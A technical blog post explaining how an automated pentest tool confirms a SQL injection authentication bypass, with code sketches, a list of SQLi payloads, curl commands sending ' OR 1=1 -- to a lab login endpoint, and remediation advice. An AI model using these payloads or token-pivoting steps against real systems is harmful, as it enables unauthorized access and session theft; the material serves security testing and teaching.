Pentest Copilot automatically exploits SQL injection to bypass authentication

A technical deep dive into how Pentest Copilot autonomously proves a SQL injection authentication bypass: browser instrumentation → action capture → guided payloads → differential oracles → secret extraction and safe session pivoting, all persisted as evidence in an Exploit Graph for replay and continuous retest.

by Kathan Desai

August 16, 2025

System view (under the hood)

Pentest Copilot runs an instrumented headless Chrome session that behaves like a real user but with full telemetry. Every click or keypress generates a canonical Action with its raw HTTP request and response (method, URL, headers, cookies, body, timings, response bytes). These artifacts are turned into typed entities in the Exploit Graph: URL, Action, BrowserSession, TestCaseRef, Vulnerability, and Secret. Edges encode provenance: ACTION → REQUEST, REQUEST → RESPONSE, TEST_CASE → REQUEST, RESPONSE → SECRET, SECRET → PRIV_ACTION. This graph-first design makes the causal chain visible and ensures replays are exact.
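
To make the graph model concrete, here is a minimal Python sketch of typed nodes and provenance edges. The entity and edge names come from the description above; the `Node` and `ExploitGraph` classes and the `lineage` helper are hypothetical illustrations, not Copilot's internal API.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Node:
    kind: str   # e.g. "ACTION", "REQUEST", "RESPONSE", "SECRET", "PRIV_ACTION"
    ident: str  # hypothetical unique id within the graph


@dataclass
class ExploitGraph:
    # Adjacency map: source node -> list of nodes it leads to.
    edges: dict = field(default_factory=dict)

    def link(self, src: Node, dst: Node) -> None:
        """Record a provenance edge src -> dst."""
        self.edges.setdefault(src, []).append(dst)

    def lineage(self, start: Node, goal_kind: str) -> list:
        """Depth-first search for a path from start to any node of goal_kind."""
        stack = [[start]]
        seen = set()
        while stack:
            path = stack.pop()
            node = path[-1]
            if node.kind == goal_kind:
                return path
            if node in seen:
                continue
            seen.add(node)
            for nxt in self.edges.get(node, []):
                stack.append(path + [nxt])
        return []


graph = ExploitGraph()
action = Node("ACTION", "login-click")
request = Node("REQUEST", "req-1")
response = Node("RESPONSE", "resp-1")
secret = Node("SECRET", "jwt-1")
graph.link(action, request)
graph.link(request, response)
graph.link(response, secret)

chain = [n.kind for n in graph.lineage(action, "SECRET")]
print(" -> ".join(chain))  # ACTION -> REQUEST -> RESPONSE -> SECRET
```

Storing edges by provenance rather than by URL is what lets a finding be read back as a single path from the user action to the secret it produced.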

Submodules and orchestration

ACTV_CRAWLER: explores the application and collects stable actions around important flows (for example, POST /rest/user/login).
ACTV_TEST_GENERATOR: creates differential test cases from those actions. For a login action, it can generate payload families (boolean, time-based, comment truncation, union) and parameter strategies (password only, both email and password, header injection attempts, JSON perturbations).
ACTV_TESTER: runs those tests, applies guardrails (rate, scope, method allow-list), and streams results back into the graph. In the Submodule Activity panes you can see generator/tester runs completing quickly; the graph updates live as results converge.
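
The guardrails mentioned for ACTV_TESTER (rate, scope, method allow-list) can be pictured as a pre-flight check that every test request must pass. The sketch below is an assumption about how such a check might look; the `Guardrails` class, its parameters, and the `lab.example.test` host are all hypothetical.

```python
import time
from urllib.parse import urlsplit


class Guardrails:
    """Hypothetical pre-flight checks: scope, method allow-list, request rate."""

    def __init__(self, allowed_hosts, allowed_methods, max_per_second):
        self.allowed_hosts = set(allowed_hosts)
        self.allowed_methods = {m.upper() for m in allowed_methods}
        self.min_interval = 1.0 / max_per_second
        self._last_sent = None

    def check(self, method, url, now=None):
        """Return (allowed, reason). `now` is injectable to keep tests deterministic."""
        now = time.monotonic() if now is None else now
        if urlsplit(url).hostname not in self.allowed_hosts:
            return False, "out of scope"
        if method.upper() not in self.allowed_methods:
            return False, "method not allowed"
        if self._last_sent is not None and now - self._last_sent < self.min_interval:
            return False, "rate limited"
        self._last_sent = now
        return True, "ok"


rails = Guardrails(["lab.example.test"], ["GET", "POST"], max_per_second=2)
print(rails.check("POST", "https://lab.example.test/rest/user/login", now=0.0))
print(rails.check("POST", "https://lab.example.test/rest/user/login", now=0.2))
print(rails.check("DELETE", "https://lab.example.test/rest/user/1", now=1.0))
print(rails.check("POST", "https://other.example.test/login", now=2.0))
```

The second call is rejected as rate limited, the third because DELETE is not on the allow-list, and the fourth because the host is outside scope.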

From a normal request to a confirmed auth bypass

Canonicalization
Each captured login request is normalized:

{
  "method": "POST",
  "url": "https://<host>/rest/user/login",
  "headers": { "...": "..." },
  "body": {"email":"<e>", "password":"<p>"},
  "context": {"cookies":[...], "session_id":"..."}
}
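
A normalizer that produces this shape could look roughly like the following. This is a sketch under assumptions: the `canonicalize` function and its specific rules (lowercased host and header names, dropped fragment, parsed JSON body) are illustrative choices, not a description of Copilot's actual normalization.

```python
import json
from urllib.parse import urlsplit, urlunsplit


def canonicalize(method, url, headers, body_text, cookies=None, session_id=None):
    """Normalize a captured request into a stable, comparable dict."""
    parts = urlsplit(url)
    # Lowercase scheme and host, drop the fragment; keep path and query as sent.
    clean_url = urlunsplit(
        (parts.scheme.lower(), parts.netloc.lower(), parts.path, parts.query, "")
    )
    return {
        "method": method.upper(),
        "url": clean_url,
        # Header names are case-insensitive, so lowercase and sort them.
        "headers": {
            k.lower(): v
            for k, v in sorted(headers.items(), key=lambda kv: kv[0].lower())
        },
        "body": json.loads(body_text) if body_text else None,
        "context": {"cookies": list(cookies or []), "session_id": session_id},
    }


a = canonicalize(
    "post",
    "HTTPS://Lab.Example.Test/rest/user/login",
    {"Content-Type": "application/json"},
    '{"email":"<e>","password":"<p>"}',
)
b = canonicalize(
    "POST",
    "https://lab.example.test/rest/user/login#frag",
    {"content-type": "application/json"},
    '{"password":"<p>","email":"<e>"}',
)
print(a == b)  # True: both captures normalize to the same request
```

Two captures that differ only in casing, fragment, or JSON key order collapse to one canonical request, which keeps later baseline-versus-modified comparisons from being polluted by cosmetic differences.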

Parameter and sink identification
The generator identifies database-relevant sinks (credential fields that flow into authentication queries) using heuristics: route templates (/login), response features (401 vs 200), and content differences (presence of tokens). It also fingerprints the backend so that it can pick a safe, backend-appropriate payload set.

Payload synthesis (SQLi families)
The generator compiles a set of SQLi payloads aimed at auth sinks:

Boolean:        ' OR 1=1 --
Quoted Boolean: " OR "1"="1" --
Comment:        --, #, /*…*/
Time-based:     '||pg_sleep(2)-- , ' AND SLEEP(2)--
Structural:     OR 1=1)/*    (balanced parens)

Each candidate is placed only where it makes sense (like the password field) while maintaining valid JSON.
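
As an illustration of placing a payload in one field while keeping the body valid JSON, consider the sketch below. The payload strings come from the families listed above; the `PAYLOADS` layout, the `generate_cases` function, and the example email address are assumptions made for the example.

```python
import copy
import json

# Payload families taken from the list above; the dict layout is an assumption.
PAYLOADS = {
    "boolean": "' OR 1=1 -- ",
    "quoted_boolean": '" OR "1"="1" -- ',
    "time_based": "' AND SLEEP(2)-- ",
}


def generate_cases(baseline_body, target_fields):
    """Yield (family, field, serialized_body) with one field mutated per case."""
    for family, payload in PAYLOADS.items():
        for name in target_fields:
            if name not in baseline_body:
                continue
            mutated = copy.deepcopy(baseline_body)
            mutated[name] = payload
            # json.dumps escapes quotes and backslashes, so the body stays valid JSON.
            yield family, name, json.dumps(mutated)


baseline = {"email": "user@lab.example.test", "password": "wrong"}
cases = list(generate_cases(baseline, ["password"]))
for family, name, body in cases:
    print(family, name, body)
```

Serializing through `json.dumps` rather than string concatenation matters most for the quoted-boolean family, whose double quotes would otherwise break the request body before it ever reached the database.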

Differential oracles
The tester runs A/B pairs (baseline vs modified) and checks oracles:

Status/redirect: 401 to 200 or redirect to authenticated route
Body/DOM: differences such as token or role fields
Headers: new Set-Cookie or Authorization header
Timing: delays matching injected sleep
Token format: JWT structure and claims

Only when two or more oracles agree does a candidate move from suspicion to confirmed evidence.
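
The two-oracle rule can be sketched as follows. The response dict keys (`status`, `headers`, `body`, `elapsed_s`), the function names, and the `eyJ`-prefix token heuristic are assumptions for illustration; only the oracle categories and the threshold of two come from the text above.

```python
import re

# Heuristic: JWT headers are base64url-encoded JSON, so they start with "eyJ".
JWT_SHAPE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")


def fired_oracles(baseline, modified, injected_delay_s=0.0):
    """Return the names of oracles that distinguish modified from baseline."""
    fired = []
    if baseline["status"] in (401, 403) and modified["status"] in (200, 302):
        fired.append("status")
    new_headers = {k.lower() for k in modified["headers"]} - {
        k.lower() for k in baseline["headers"]
    }
    if new_headers & {"set-cookie", "authorization"}:
        fired.append("headers")
    if JWT_SHAPE.search(modified["body"]) and not JWT_SHAPE.search(baseline["body"]):
        fired.append("token")
    if injected_delay_s > 0 and modified["elapsed_s"] - baseline["elapsed_s"] >= injected_delay_s:
        fired.append("timing")
    return fired


def verdict(fired, threshold=2):
    """Confirm only when at least `threshold` independent oracles agree."""
    if len(fired) >= threshold:
        return "confirmed"
    return "suspected" if fired else "clean"


baseline = {
    "status": 401,
    "headers": {"Content-Type": "text/html"},
    "body": "Invalid email or password.",
    "elapsed_s": 0.12,
}
modified = {
    "status": 200,
    "headers": {"Content-Type": "application/json"},
    "body": '{"authentication":{"token":"eyJhbGciOiJub25lIn0.eyJyb2xlIjoidXNlciJ9.c2ln"}}',
    "elapsed_s": 0.15,
}
fired = fired_oracles(baseline, modified)
print(fired, verdict(fired))  # ['status', 'token'] confirmed
```

A status flip alone would only be "suspected" here; it is the token appearing in the modified response that pushes the candidate over the threshold.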

Secret extraction and pivot
When a token is present, the extractor pipeline validates it (regex → format check → entropy → semantic test like accessing /profile). On success, the token is stored as a Secret tied to the request and response. The tester may then pivot (like requesting a user page) to demonstrate impact, within configured limits.

The screenshots show this lifecycle: a Vulnerability node mapped to CWE-89, the vulnerable requests with status 200, the justification text, and a redacted JWT string stored as a Secret.

The evidence record

A Copilot evidence record might look like:

{
  "modified_request": {
    "url": "https://<host>/rest/user/login",
    "method": "POST",
    "headers": {...},
    "body": {"email":"<email>","password":"' OR 1=1 -- "}
  },
  "response": {
    "status_code": 200,
    "response_headers": {"content-type":"application/json"},
    "body_sample": {"authentication":"<redacted>", "role":"user"},
    "response_size": 2132,
    "response_time_ms": 712
  },
  "request_vulnerability_justification": "Differential analysis between baseline 401 and modified 200 with token indicates SQLi in authentication.",
  "final_verdict": {
    "verdict": "confirmed",
    "final_severity": "critical",
    "justification": "Unauthenticated user obtained valid session token via SQL injection bypass."
  },
  "secret_exists": true,
  "secret_type": "jwt",
  "next_step": {"action_type":"USE_SESSION", "context":"validate access to authenticated endpoints"}
}

Why this approach reduces false positives

Graph lineage: every claim is a path from Action → Request → Response → Secret → Authenticated Action.
Multiple oracles: at least two independent signals (status, body, headers, timing, token semantics) must agree before a finding is confirmed.
Replayability: you can export curl commands and rerun them; Copilot does the same for retesting.
Safety: payload limits, method allow-lists, and scope boundaries prevent destructive behavior.
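
To illustrate the replayability point, the sketch below renders a stored request as a shell-safe curl command. The `to_curl` function, the request dict shape, and the `lab.example.test` host are hypothetical; the quoting relies on Python's standard `shlex.quote`.

```python
import json
import shlex


def to_curl(request):
    """Render a request dict (method, url, headers, body) as a curl command."""
    parts = ["curl", "-sS", "-i", "-X", request["method"], request["url"]]
    for name, value in request.get("headers", {}).items():
        parts += ["-H", f"{name}: {value}"]
    if request.get("body") is not None:
        parts += ["--data", json.dumps(request["body"])]
    # shlex.quote handles embedded single quotes, which SQLi payloads often contain.
    return " ".join(shlex.quote(p) for p in parts)


evidence_request = {
    "method": "POST",
    "url": "https://lab.example.test/rest/user/login",
    "headers": {"Content-Type": "application/json"},
    "body": {"email": "user@lab.example.test", "password": "' OR 1=1 -- "},
}
command = to_curl(evidence_request)
print(command)
```

Generating the command from the evidence record, rather than writing it by hand, avoids the quoting mistakes that are easy to make when a payload itself contains quote characters.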

Practical reproduction (safe for developers)

Run these only in a lab or with explicit authorization:

# Baseline: expect 401
curl -sS -i https://juice.bugbase.ai/rest/user/login \
  -H 'Content-Type: application/json' \
  --data '{"email":"<email>","password":"wrong"}'

# Modified: boolean SQLi. Inside a single-quoted shell string, a literal ' is written as '\''
curl -sS -i https://juice.bugbase.ai/rest/user/login \
  -H 'Content-Type: application/json' \
  --data '{"email":"<email>","password":"'\'' OR 1=1 -- "}'

If the second call returns 200 and a token-like body, Copilot’s oracles fire and it records the Secret.

How to fix

Use parameterized queries with bound variables; never interpolate user input into SQL strings.
Perform credential checks outside SQL: look the user up by identifier, then verify the password in application code against a salted hash (argon2 or bcrypt).
Restrict DB roles so auth queries can’t modify schema or run dangerous functions.
Return uniform errors and avoid echoing inputs.
Follow token best practices: short TTLs, rotation, cookies flagged HttpOnly, Secure, and SameSite, and no token exposure to unauthenticated contexts.
Continuously retest: Copilot replays the same evidence path to confirm fixes.
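
The first two fixes can be demonstrated with a self-contained example using Python's built-in `sqlite3` module. This is a minimal sketch: the table layout, function names, and example account are made up, and PBKDF2 stands in for argon2 or bcrypt only because it ships with the standard library.

```python
import hashlib
import hmac
import os
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (email TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")


def hash_password(password, salt):
    # PBKDF2 is a stdlib stand-in; prefer argon2 or bcrypt in production.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def register(email, password):
    salt = os.urandom(16)
    db.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        (email, salt, hash_password(password, salt)),
    )


def login(email, password):
    # Bound parameter: the driver never parses `email` as SQL.
    row = db.execute(
        "SELECT salt, pw_hash FROM users WHERE email = ?", (email,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    # The password never reaches the query; compare hashes in constant time.
    return hmac.compare_digest(stored, hash_password(password, salt))


register("user@lab.example.test", "correct horse")
print(login("user@lab.example.test", "correct horse"))  # True
print(login("user@lab.example.test", "' OR 1=1 -- "))   # False
print(login("' OR 1=1 -- ", "anything"))                # False
```

Because the password is never part of the SQL text and the email is bound as data, the boolean payload from the reproduction steps is treated as an ordinary (wrong) string in both positions.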

How Copilot finds vulnerabilities broadly

Action-centric crawling focuses on workflows, not just URLs.
Grammar-guided mutation tailors payloads to the sink and the vulnerability class under test (SQLi, XSS, SSTI, IDOR).
Differential and semantic oracles turn fuzzing into provable findings.
Secret harvesting automatically gathers leaked tokens and uses them to explore deeper.
The Exploit Graph keeps causality intact so you can pivot, retest, and audit without guesswork.